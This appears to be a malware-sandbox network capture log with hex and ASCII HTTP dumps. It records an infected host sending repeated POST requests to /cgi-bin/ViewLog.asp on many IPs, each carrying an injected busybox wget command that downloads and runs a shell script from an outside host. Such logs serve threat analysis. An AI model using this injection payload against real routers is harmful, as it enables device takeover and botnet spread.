                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                        Feb 14, 2024 09:36:11.157130957 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                        Feb 14, 2024 09:36:11.157169104 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                        Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                        Feb 14, 2024 09:36:11.157269955 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                        Feb 14, 2024 09:36:11.157305956 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                        Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                        Feb 14, 2024 09:36:11.157362938 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                        Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                        Feb 14, 2024 09:36:11.157428026 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                        Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                        Feb 14, 2024 09:36:11.157475948 CET356INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to mail92100.maychuemail.com's <a href="mailto:quanph
                                                        Feb 14, 2024 09:36:11.157541037 CET1286INData Raw: 20 6f 6e 20 57 65 64 6e 65 73 64 61 79 2c 20 31 34 2d 46 65 62 2d 32 30 32 34 20 31 35 3a 33 36 3a 31 30 20 2b 30 37 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20
                                                        Data Ascii: on Wednesday, 14-Feb-2024 15:36:10 +07"> WebMaster</a>. </section> <p class="reason-text">Your browser sent a request that this server could not understand:</p> </div> <section class="additional-info">
                                                        Feb 14, 2024 09:36:11.157586098 CET24INData Raw: 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: dy></html>
                                                        Feb 14, 2024 09:36:12.374270916 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1405192.168.2.145106485.7.246.818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.003002882 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.670099020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.882700920 CET29INHTTP/1.1 200 OK


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1406192.168.2.145716431.200.2.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.030500889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1407192.168.2.145034094.122.222.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.033006907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1408192.168.2.145018894.120.152.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.033101082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1409192.168.2.144584294.123.88.828080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.033740997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1410192.168.2.144252694.229.82.988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.258095980 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1411192.168.2.145656894.122.81.1108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.278386116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1412192.168.2.145702494.121.147.38080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.505738020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1413192.168.2.144714094.120.39.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.506125927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1414192.168.2.143638894.122.51.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:11.506185055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1415192.168.2.146076431.185.4.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.050473928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.774558067 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.003504992 CET388INHTTP/1.1 404 Not Found
